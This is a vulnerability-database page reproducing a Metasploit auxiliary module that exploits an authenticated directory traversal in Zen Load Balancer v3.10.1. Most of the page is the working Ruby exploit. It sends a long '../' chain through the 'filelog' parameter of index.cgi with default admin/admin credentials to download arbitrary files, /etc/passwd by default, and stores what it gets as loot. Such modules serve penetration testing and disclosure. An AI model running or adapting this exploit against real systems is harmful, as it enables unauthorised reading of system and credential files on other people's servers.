Lucene search
K

Zen Load Balancer Directory Traversal

🗓️ 12 Apr 2020 10:43:15Reported by Basim Alabdullah, Dhiraj MishraType 
metasploit
 metasploit
🔗 www.rapid7.com👁 37 Views

Zen Load Balancer Directory Traversal 'v3.10.1' authenticate

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zen Load Balancer Directory Traversal',
        'Description' => %q{
          This module exploits a authenticated directory traversal vulnerability in Zen Load
          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog='
          parameter which allows a malicious actor to load arbitrary file path.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Basim Alabdullah', # Vulnerability discovery
          'Dhiraj Mishra'     # Metasploit module
        ],
        'References' => [
          ['EDB', '48308']
        ],
        'DisclosureDate' => '2020-04-10',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(444),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']),
        OptString.new('TARGETURI', [true, 'The base URI path of the ZenConsole install', '/']),
        OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']),
        OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin'])
      ]
    )
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    traversal = '../' * datastore['DEPTH']

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.cgi'),
      'vars_get' =>
      {
        'id' => '2-3',
        'filelog' => "#{traversal}#{filename}",
        'nlines' => '100',
        'action' => 'See logs'
      },
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
    }, 25)

    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    print_good("#{peer} - Downloaded #{res.body.length} bytes")
    path = store_loot(
      'zenload.http',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation